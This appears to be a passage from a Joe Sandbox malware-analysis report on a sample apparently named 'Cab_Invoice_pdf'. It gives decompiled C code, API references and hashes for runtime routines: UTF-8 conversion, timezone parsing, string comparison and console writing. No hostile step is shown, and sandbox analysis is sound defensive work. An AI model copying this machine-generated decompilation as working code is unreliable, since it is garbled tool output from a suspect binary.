                            • API String ID: 2009864989-2673223963
                            • Opcode ID: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction ID: 496f7c65bc7fced27dd958ce77e84fe30bde78c8848fef24518dbe2a0e628ded
                            • Opcode Fuzzy Hash: 08da7eadab9082369601e11e61dd1e5a11971e47bed2242a162ef8653c194c7e
                            • Instruction Fuzzy Hash: 4B115B72500201BBDB151B7ADC498577B9DBE8137EF0D4161FC06A320FEA21E55087F9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E01314C90(char* _a4, short* _a8, int _a12) {
                            				void* _t17;
                            				void* _t18;
                            				int _t19;
                            				char* _t20;
                            				void* _t21;
                            
                            				_t20 = _a4;
                            				if(_t20 != 0) {
                            					_t19 = _a12;
                            					goto L6;
                            				} else {
                            					_t19 = WideCharToMultiByte(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20, _t20, _t20);
                            					_t26 = _t19;
                            					if(_t19 != 0) {
                            						_t3 = _t19 + 1; // 0x1
                            						_push(1);
                            						_t20 = E013197F8(_t17);
                            						_t21 = _t21 + 8;
                            						__eflags = _t20;
                            						if(__eflags != 0) {
                            							L6:
                            							__eflags = WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff, _t20, _t19, 0, 0);
                            							if(__eflags != 0) {
                            								return _t20;
                            							} else {
                            								_push("Failed to encode wchar_t as UTF-8.\n");
                            								_push("WideCharToMultiByte");
                            								E01311860(_t18, __eflags);
                            								__eflags = 0;
                            								return 0;
                            							}
                            						} else {
                            							_push("Out of memory.");
                            							_push("win32_utils_to_utf8");
                            							E01311860(_t18, __eflags);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Failed to get UTF-8 buffer size.\n");
                            						_push("WideCharToMultiByte");
                            						E01311860(_t18, _t26);
                            						return 0;
                            					}
                            				}
                            			}

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314D0F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 1717984340-3595433791
                            • Opcode ID: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction ID: 1ec15ea0bded8a1228b1423270a4caae19ab23d71fe9e0c9a6ca48847eb2c96d
                            • Opcode Fuzzy Hash: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction Fuzzy Hash: EE01F93779533676CA3161AF7C09FCB6AD9CFD1BB9F150225FA18F2288D650940282F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E0132AFBE(void* __eflags, signed int _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				int _v16;
                            				int _v20;
                            				int _v24;
                            				char _v52;
                            				int _v56;
                            				int _v60;
                            				signed int _v100;
                            				char _v272;
                            				intOrPtr _v276;
                            				char _v280;
                            				char _v356;
                            				char _v360;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t65;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t78;
                            				void* _t80;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t90;
                            				long _t92;
                            				signed int* _t95;
                            				signed int _t98;
                            				signed int _t101;
                            				signed int _t105;
                            				void* _t112;
                            				signed int _t115;
                            				void* _t116;
                            				void* _t118;
                            				void* _t119;
                            				void* _t121;
                            				signed int _t123;
                            				signed int _t124;
                            				signed int _t127;
                            				void* _t130;
                            				void* _t132;
                            				signed int _t133;
                            				signed int _t135;
                            				void* _t141;
                            				intOrPtr _t142;
                            				void* _t144;
                            				signed int _t151;
                            				signed int _t152;
                            				signed int _t155;
                            				signed int _t159;
                            				signed int _t162;
                            				intOrPtr* _t167;
                            				intOrPtr _t168;
                            				signed int _t169;
                            				intOrPtr* _t170;
                            				void* _t171;
                            				void* _t172;
                            				signed int _t173;
                            				int _t177;
                            				signed int _t179;
                            				char** _t180;
                            				signed int _t184;
                            				signed int _t186;
                            				void* _t195;
                            				signed int _t196;
                            				void* _t197;
                            				signed int _t198;
                            
                            				_push(_t179);
                            				_t65 = E0132ABFC();
                            				_v8 = _v8 & 0x00000000;
                            				_t135 = _t65;
                            				_v16 = _v16 & 0x00000000;
                            				_v12 = _t135;
                            				if(E0132AC5A( &_v8) != 0 || E0132AC02( &_v16) != 0) {
                            					L46:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E01321798();
                            					asm("int3");
                            					_t195 = _t197;
                            					_t198 = _t197 - 0x10;
                            					_push(_t135);
                            					_t180 = E0132ABFC();
                            					_v52 = 0;
                            					_v56 = 0;
                            					_v60 = 0;
                            					_t72 = E0132AC5A( &_v52);
                            					_t144 = _t179;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						L66:
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E01321798();
                            						asm("int3");
                            						_push(_t195);
                            						_t196 = _t198;
                            						_t74 =  *0x133c008; // 0xa3433343
                            						_v100 = _t74 ^ _t196;
                            						 *0x133c91c =  *0x133c91c | 0xffffffff;
                            						 *0x133c910 =  *0x133c910 | 0xffffffff;
                            						_push(0);
                            						_push(_t180);
                            						_push(_t172);
                            						_t137 = "TZ";
                            						_t173 = 0;
                            						 *0x1346578 = 0;
                            						_t78 = E01326CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ");
                            						__eflags = _t78;
                            						if(_t78 != 0) {
                            							__eflags = _t78 - 0x22;
                            							if(_t78 == 0x22) {
                            								_t186 = E01320A25(_t144, _v276);
                            								__eflags = _t186;
                            								if(__eflags != 0) {
                            									_t84 = E01326CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										E013209EB(0);
                            										_t173 = _t186;
                            									} else {
                            										_push(_t186);
                            										goto L72;
                            									}
                            								} else {
                            									_push(0);
                            									L72:
                            									E013209EB();
                            								}
                            							}
                            						} else {
                            							_t173 =  &_v272;
                            						}
                            						asm("sbb esi, esi");
                            						_t184 =  ~(_t173 -  &_v272) & _t173;
                            						__eflags = _t173;
                            						if(_t173 == 0) {
                            							L80:
                            							L47();
                            						} else {
                            							__eflags =  *_t173;
                            							if(__eflags == 0) {
                            								goto L80;
                            							} else {
                            								_push(_t173);
                            								E0132AFBE(__eflags);
                            							}
                            						}
                            						_t80 = E013209EB(_t184);
                            						__eflags = _v16 ^ _t196;
                            						E0131786A();
                            						return _t80;
                            					} else {
                            						_t88 = E0132AC02( &_v16);
                            						_pop(_t144);
                            						__eflags = _t88;
                            						if(_t88 != 0) {
                            							goto L66;
                            						} else {
                            							_t90 = E0132AC2E( &_v20);
                            							_pop(_t144);
                            							__eflags = _t90;
                            							if(_t90 != 0) {
                            								goto L66;
                            							} else {
                            								E013209EB( *0x1346574);
                            								 *0x1346574 = 0;
                            								 *_t198 = 0x1346580;
                            								_t92 = GetTimeZoneInformation(??);
                            								__eflags = _t92 - 0xffffffff;
                            								if(_t92 != 0xffffffff) {
                            									_t151 =  *0x1346580 * 0x3c;
                            									_t169 =  *0x13465d4; // 0x0
                            									_push(_t172);
                            									 *0x1346578 = 1;
                            									_v12 = _t151;
                            									__eflags =  *0x13465c6; // 0x0
                            									if(__eflags != 0) {
                            										_t152 = _t151 + _t169 * 0x3c;
                            										__eflags = _t152;
                            										_v12 = _t152;
                            									}
                            									__eflags =  *0x134661a; // 0x0
                            									if(__eflags == 0) {
                            										L56:
                            										_v16 = 0;
                            										_v20 = 0;
                            									} else {
                            										_t105 =  *0x1346628; // 0x0
                            										__eflags = _t105;
                            										if(_t105 == 0) {
                            											goto L56;
                            										} else {
                            											_v16 = 1;
                            											_v20 = (_t105 - _t169) * 0x3c;
                            										}
                            									}
                            									_t177 = E01327D59(0, _t169);
                            									_t98 = WideCharToMultiByte(_t177, 0, 0x1346584, 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
                            									__eflags = _t98;
                            									if(_t98 == 0) {
                            										L60:
                            										 *( *_t180) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L60;
                            										} else {
                            											( *_t180)[0x3f] = 0;
                            										}
                            									}
                            									_t101 = WideCharToMultiByte(_t177, 0, 0x13465d8, 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
                            									__eflags = _t101;
                            									if(_t101 == 0) {
                            										L64:
                            										 *(_t180[1]) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L64;
                            										} else {
                            											_t180[1][0x3f] = 0;
                            										}
                            									}
                            								}
                            								 *(E0132ABF6()) = _v12;
                            								 *((intOrPtr*)(E0132ABEA())) = _v16;
                            								_t95 = E0132ABF0();
                            								 *_t95 = _v20;
                            								return _t95;
                            							}
                            						}
                            					}
                            				} else {
                            					_t170 =  *0x1346574; // 0x0
                            					_t179 = _a4;
                            					if(_t170 == 0) {
                            						L12:
                            						E013209EB(_t170);
                            						_t155 = _t179;
                            						_t12 = _t155 + 1; // 0x132b3af
                            						_t171 = _t12;
                            						do {
                            							_t112 =  *_t155;
                            							_t155 = _t155 + 1;
                            						} while (_t112 != 0);
                            						_t13 = _t155 - _t171 + 1; // 0x132b3b0
                            						 *0x1346574 = E01320A25(_t155 - _t171, _t13);
                            						_t115 = E013209EB(0);
                            						_t168 =  *0x1346574; // 0x0
                            						if(_t168 == 0) {
                            							goto L45;
                            						} else {
                            							_t159 = _t179;
                            							_push(_t172);
                            							_t14 = _t159 + 1; // 0x132b3af
                            							_t172 = _t14;
                            							do {
                            								_t116 =  *_t159;
                            								_t159 = _t159 + 1;
                            							} while (_t116 != 0);
                            							_t15 = _t159 - _t172 + 1; // 0x132b3b0
                            							_t118 = E01320A73(_t168, _t15, _t179);
                            							_t197 = _t197 + 0xc;
                            							if(_t118 != 0) {
                            								goto L46;
                            							} else {
                            								_t172 = 3;
                            								_push(_t172);
                            								_t119 = E013250A9(_t160,  *_t135, 0x40, _t179);
                            								_t197 = _t197 + 0x10;
                            								if(_t119 != 0) {
                            									goto L46;
                            								} else {
                            									while( *_t179 != 0) {
                            										_t179 = _t179 + 1;
                            										_t172 = _t172 - 1;
                            										if(_t172 != 0) {
                            											continue;
                            										}
                            										break;
                            									}
                            									_pop(_t172);
                            									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
                            									if(_t135 != 0) {
                            										_t179 = _t179 + 1;
                            									}
                            									_t162 = E01321594(_t160, _t179) * 0xe10;
                            									_v8 = _t162;
                            									while(1) {
                            										_t121 =  *_t179;
                            										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
                            											break;
                            										}
                            										_t179 = _t179 + 1;
                            									}
                            									__eflags =  *_t179 - 0x3a;
                            									if( *_t179 == 0x3a) {
                            										_t179 = _t179 + 1;
                            										_t162 = _v8 + E01321594(_t162, _t179) * 0x3c;
                            										_v8 = _t162;
                            										while(1) {
                            											_t130 =  *_t179;
                            											__eflags = _t130 - 0x30;
                            											if(_t130 < 0x30) {
                            												break;
                            											}
                            											__eflags = _t130 - 0x39;
                            											if(_t130 <= 0x39) {
                            												_t179 = _t179 + 1;
                            												__eflags = _t179;
                            												continue;
                            											}
                            											break;
                            										}
                            										__eflags =  *_t179 - 0x3a;
                            										if( *_t179 == 0x3a) {
                            											_t179 = _t179 + 1;
                            											_t162 = _v8 + E01321594(_t162, _t179);
                            											_v8 = _t162;
                            											while(1) {
                            												_t132 =  *_t179;
                            												__eflags = _t132 - 0x30;
                            												if(_t132 < 0x30) {
                            													goto L38;
                            												}
                            												__eflags = _t132 - 0x39;
                            												if(_t132 <= 0x39) {
                            													_t179 = _t179 + 1;
                            													__eflags = _t179;
                            													continue;
                            												}
                            												goto L38;
                            											}
                            										}
                            									}
                            									L38:
                            									__eflags = _t135;
                            									if(_t135 != 0) {
                            										_v8 = _t162;
                            									}
                            									__eflags =  *_t179;
                            									_t123 = 0 |  *_t179 != 0x00000000;
                            									_v16 = _t123;
                            									__eflags = _t123;
                            									_t124 = _v12;
                            									if(_t123 == 0) {
                            										_t29 = _t124 + 4; // 0xfffffddd
                            										 *((char*)( *_t29)) = 0;
                            										goto L44;
                            									} else {
                            										_push(3);
                            										_t28 = _t124 + 4; // 0xfffffddd
                            										_t127 = E013250A9(_t162,  *_t28, 0x40, _t179);
                            										_t197 = _t197 + 0x10;
                            										__eflags = _t127;
                            										if(_t127 == 0) {
                            											L44:
                            											 *(E0132ABF6()) = _v8;
                            											_t115 = E0132ABEA();
                            											 *_t115 = _v16;
                            											goto L45;
                            										} else {
                            											goto L46;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						_t167 = _t170;
                            						_t133 = _t179;
                            						while(1) {
                            							_t141 =  *_t133;
                            							if(_t141 !=  *_t167) {
                            								break;
                            							}
                            							if(_t141 == 0) {
                            								L8:
                            								_t115 = 0;
                            							} else {
                            								_t9 = _t133 + 1; // 0xdde805eb
                            								_t142 =  *_t9;
                            								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
                            									break;
                            								} else {
                            									_t133 = _t133 + 2;
                            									_t167 = _t167 + 2;
                            									if(_t142 != 0) {
                            										continue;
                            									} else {
                            										goto L8;
                            									}
                            								}
                            							}
                            							L10:
                            							if(_t115 == 0) {
                            								L45:
                            								return _t115;
                            							} else {
                            								_t135 = _v12;
                            								goto L12;
                            							}
                            							goto L82;
                            						}
                            						asm("sbb eax, eax");
                            						_t115 = _t133 | 0x00000001;
                            						__eflags = _t115;
                            						goto L10;
                            					}
                            				}
                            				L82:
                            			}

                            APIs
                            • _free.LIBCMT ref: 0132B040
                            • _free.LIBCMT ref: 0132B064
                            • _free.LIBCMT ref: 0132B1EB
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,01346584,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,013465D8,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B3B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 16219a437e5df867b2c4742aa3259a2acdc335df800c2986807eb60fc79da7f4
                            • Instruction ID: ad1e6ccfdb1e434a41802fe5c3c720eb15ba9e5c4ffc7f115376f5ba56a64db3
                            • Opcode Fuzzy Hash: 16219a437e5df867b2c4742aa3259a2acdc335df800c2986807eb60fc79da7f4
                            • Instruction Fuzzy Hash: 2AC15A71D00325AFDB25FF7C8841AAEFBBCEF46358F14419AD99097249EB309A41C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E0132D04A(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                            				signed int _v8;
                            				char _v22;
                            				struct _cpinfo _v28;
                            				short* _v32;
                            				int _v36;
                            				char* _v40;
                            				int _v44;
                            				intOrPtr _v48;
                            				void* _v60;
                            				signed int _t63;
                            				short* _t68;
                            				int _t69;
                            				signed int _t71;
                            				short* _t72;
                            				signed int _t75;
                            				short* _t85;
                            				int _t93;
                            				intOrPtr _t96;
                            				intOrPtr _t97;
                            				signed int _t107;
                            				char* _t109;
                            				char* _t110;
                            				void* _t115;
                            				void* _t116;
                            				intOrPtr _t117;
                            				intOrPtr _t118;
                            				intOrPtr* _t120;
                            				short* _t122;
                            				int _t124;
                            				int _t126;
                            				short* _t127;
                            				intOrPtr* _t128;
                            				signed int _t129;
                            				short* _t130;
                            
                            				_t63 =  *0x133c008; // 0xa3433343
                            				_v8 = _t63 ^ _t129;
                            				_t124 = _a20;
                            				_v44 = _a4;
                            				_v48 = _a8;
                            				_t67 = _a24;
                            				_v40 = _a24;
                            				_t120 = _a16;
                            				_v36 = _t120;
                            				if(_t124 <= 0) {
                            					if(_t124 >= 0xffffffff) {
                            						goto L2;
                            					} else {
                            						goto L5;
                            					}
                            				} else {
                            					_t124 = E0132CA63(_t120, _t124);
                            					_t67 = _v40;
                            					L2:
                            					_t93 = _a28;
                            					if(_t93 <= 0) {
                            						if(_t93 < 0xffffffff) {
                            							goto L5;
                            						} else {
                            							goto L7;
                            						}
                            					} else {
                            						_t93 = E0132CA63(_t67, _t93);
                            						L7:
                            						_t69 = _a32;
                            						if(_t69 == 0) {
                            							_t69 =  *( *_v44 + 8);
                            							_a32 = _t69;
                            						}
                            						if(_t124 == 0 || _t93 == 0) {
                            							if(_t124 != _t93) {
                            								if(_t93 <= 1) {
                            									if(_t124 <= 1) {
                            										if(GetCPInfo(_t69,  &_v28) == 0) {
                            											goto L5;
                            										} else {
                            											if(_t124 <= 0) {
                            												if(_t93 <= 0) {
                            													goto L36;
                            												} else {
                            													_t68 = 2;
                            													if(_v28 >= _t68) {
                            														_t109 =  &_v22;
                            														if(_v22 != 0) {
                            															_t128 = _v40;
                            															while(1) {
                            																_t117 =  *((intOrPtr*)(_t109 + 1));
                            																if(_t117 == 0) {
                            																	goto L15;
                            																}
                            																_t96 =  *_t128;
                            																if(_t96 <  *_t109 || _t96 > _t117) {
                            																	_t109 = _t109 + _t68;
                            																	if( *_t109 != 0) {
                            																		continue;
                            																	} else {
                            																		goto L15;
                            																	}
                            																}
                            																goto L63;
                            															}
                            														}
                            													}
                            													goto L15;
                            												}
                            											} else {
                            												_t68 = 2;
                            												if(_v28 >= _t68) {
                            													_t110 =  &_v22;
                            													if(_v22 != 0) {
                            														while(1) {
                            															_t118 =  *((intOrPtr*)(_t110 + 1));
                            															if(_t118 == 0) {
                            																goto L17;
                            															}
                            															_t97 =  *_t120;
                            															if(_t97 <  *_t110 || _t97 > _t118) {
                            																_t110 = _t110 + _t68;
                            																if( *_t110 != 0) {
                            																	continue;
                            																} else {
                            																	goto L17;
                            																}
                            															}
                            															goto L63;
                            														}
                            													}
                            												}
                            												goto L17;
                            											}
                            										}
                            									} else {
                            										L17:
                            										_push(3);
                            										goto L13;
                            									}
                            								} else {
                            									L15:
                            									_t68 = 1;
                            								}
                            							} else {
                            								_push(2);
                            								L13:
                            								_pop(_t68);
                            							}
                            						} else {
                            							L36:
                            							_t122 = 0;
                            							_t71 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
                            							_v44 = _t71;
                            							if(_t71 == 0) {
                            								L5:
                            								_t68 = 0;
                            							} else {
                            								_t115 = _t71 + _t71;
                            								asm("sbb eax, eax");
                            								if((_t115 + 0x00000008 & _t71) == 0) {
                            									_t72 = 0;
                            									_v32 = 0;
                            									goto L45;
                            								} else {
                            									asm("sbb eax, eax");
                            									_t83 = _t71 & _t115 + 0x00000008;
                            									_t107 = _t115 + 8;
                            									if((_t71 & _t115 + 0x00000008) > 0x400) {
                            										asm("sbb eax, eax");
                            										_t85 = E01320A25(_t107, _t83 & _t107);
                            										_v32 = _t85;
                            										if(_t85 == 0) {
                            											goto L61;
                            										} else {
                            											 *_t85 = 0xdddd;
                            											goto L43;
                            										}
                            									} else {
                            										asm("sbb eax, eax");
                            										E0132F250();
                            										_t85 = _t130;
                            										_v32 = _t85;
                            										if(_t85 == 0) {
                            											L61:
                            											_t95 = _v32;
                            										} else {
                            											 *_t85 = 0xcccc;
                            											L43:
                            											_t72 =  &(_t85[4]);
                            											_v32 = _t72;
                            											L45:
                            											if(_t72 == 0) {
                            												goto L61;
                            											} else {
                            												_t126 = _a32;
                            												if(MultiByteToWideChar(_t126, 1, _v36, _t124, _t72, _v44) == 0) {
                            													goto L61;
                            												} else {
                            													_t75 = MultiByteToWideChar(_t126, 9, _v40, _t93, _t122, _t122);
                            													_v36 = _t75;
                            													if(_t75 == 0) {
                            														goto L61;
                            													} else {
                            														_t116 = _t75 + _t75;
                            														_t103 = _t116 + 8;
                            														asm("sbb eax, eax");
                            														if((_t116 + 0x00000008 & _t75) == 0) {
                            															_t127 = _t122;
                            															goto L56;
                            														} else {
                            															asm("sbb eax, eax");
                            															_t79 = _t75 & _t116 + 0x00000008;
                            															_t103 = _t116 + 8;
                            															if((_t75 & _t116 + 0x00000008) > 0x400) {
                            																asm("sbb eax, eax");
                            																_t127 = E01320A25(_t103, _t79 & _t103);
                            																_pop(_t103);
                            																if(_t127 == 0) {
                            																	goto L59;
                            																} else {
                            																	 *_t127 = 0xdddd;
                            																	goto L54;
                            																}
                            															} else {
                            																asm("sbb eax, eax");
                            																E0132F250();
                            																_t127 = _t130;
                            																if(_t127 == 0) {
                            																	L59:
                            																	_t95 = _v32;
                            																} else {
                            																	 *_t127 = 0xcccc;
                            																	L54:
                            																	_t127 =  &(_t127[4]);
                            																	L56:
                            																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t127, _v36) == 0) {
                            																		goto L59;
                            																	} else {
                            																		_t95 = _v32;
                            																		_t122 = E013236EC(_t103, _v48, _a12, _v32, _v44, _t127, _v36, _t122, _t122, _t122);
                            																	}
                            																}
                            															}
                            														}
                            														E0132815E(_t127);
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            								E0132815E(_t95);
                            								_t68 = _t122;
                            							}
                            						}
                            					}
                            				}
                            				L63:
                            				E0131786A();
                            				return _t68;
                            			}

                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 0132D0F6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D179
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0132D323,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D20C
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D223
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D29F
                            • __freea.LIBCMT ref: 0132D2CA
                            • __freea.LIBCMT ref: 0132D2D6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 2829977744-0
                            • Opcode ID: 823513f1dc46aa5b05042edc04155cdbdfe6f82c2ecaf26268df5660bb39a0ed
                            • Instruction ID: 4fc1b87ba5e2d5526e9c9426ab74f100526de1b2710f6937ebadfe2848311d60
                            • Opcode Fuzzy Hash: 823513f1dc46aa5b05042edc04155cdbdfe6f82c2ecaf26268df5660bb39a0ed
                            • Instruction Fuzzy Hash: DD91D971E0032A9FEB25AEE8CC40EEEBBB9EF06768F148559E905E7150D735D841C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E01322A10(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				signed char _v15;
                            				char _v16;
                            				void _v24;
                            				short _v28;
                            				char _v31;
                            				void _v32;
                            				long _v36;
                            				intOrPtr _v40;
                            				void* _v44;
                            				signed int _v48;
                            				signed char* _v52;
                            				long _v56;
                            				int _v60;
                            				void* __ebx;
                            				signed int _t78;
                            				signed int _t80;
                            				int _t86;
                            				void* _t93;
                            				long _t96;
                            				void _t104;
                            				void* _t111;
                            				signed int _t115;
                            				signed int _t118;
                            				signed char _t123;
                            				signed char _t128;
                            				intOrPtr _t129;
                            				signed int _t131;
                            				signed char* _t133;
                            				intOrPtr* _t136;
                            				signed int _t138;
                            				void* _t139;
                            
                            				_t78 =  *0x133c008; // 0xa3433343
                            				_v8 = _t78 ^ _t138;
                            				_t80 = _a8;
                            				_t118 = _t80 >> 6;
                            				_t115 = (_t80 & 0x0000003f) * 0x30;
                            				_t133 = _a12;
                            				_v52 = _t133;
                            				_v48 = _t118;
                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1346108 + _t118 * 4)) + _t115 + 0x18));
                            				_v40 = _a16 + _t133;
                            				_t86 = GetConsoleCP();
                            				_t136 = _a4;
                            				_v60 = _t86;
                            				 *_t136 = 0;
                            				 *((intOrPtr*)(_t136 + 4)) = 0;
                            				 *((intOrPtr*)(_t136 + 8)) = 0;
                            				while(_t133 < _v40) {
                            					_v28 = 0;
                            					_v31 =  *_t133;
                            					_t129 =  *((intOrPtr*)(0x1346108 + _v48 * 4));
                            					_t123 =  *(_t129 + _t115 + 0x2d);
                            					if((_t123 & 0x00000004) == 0) {
                            						if(( *(E01327D33(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                            							_push(1);
                            							_push(_t133);
                            							goto L8;
                            						} else {
                            							if(_t133 >= _v40) {
                            								_t131 = _v48;
                            								 *((char*)( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                            								 *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                            							} else {
                            								_t111 = E01323F5B( &_v28, _t133, 2);
                            								_t139 = _t139 + 0xc;
                            								if(_t111 != 0xffffffff) {
                            									_t133 =  &(_t133[1]);
                            									goto L9;
                            								}
                            							}
                            						}
                            					} else {
                            						_t128 = _t123 & 0x000000fb;
                            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                            						_push(2);
                            						_v15 = _t128;
                            						 *(_t129 + _t115 + 0x2d) = _t128;
                            						_push( &_v16);
                            						L8:
                            						_push( &_v28);
                            						_t93 = E01323F5B();
                            						_t139 = _t139 + 0xc;
                            						if(_t93 != 0xffffffff) {
                            							L9:
                            							_t133 =  &(_t133[1]);
                            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                            							_v56 = _t96;
                            							if(_t96 != 0) {
                            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                            									L19:
                            									 *_t136 = GetLastError();
                            								} else {
                            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                            									if(_v36 >= _v56) {
                            										if(_v31 != 0xa) {
                            											goto L16;
                            										} else {
                            											_t104 = 0xd;
                            											_v32 = _t104;
                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                            												goto L19;
                            											} else {
                            												if(_v36 >= 1) {
                            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                            													goto L16;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
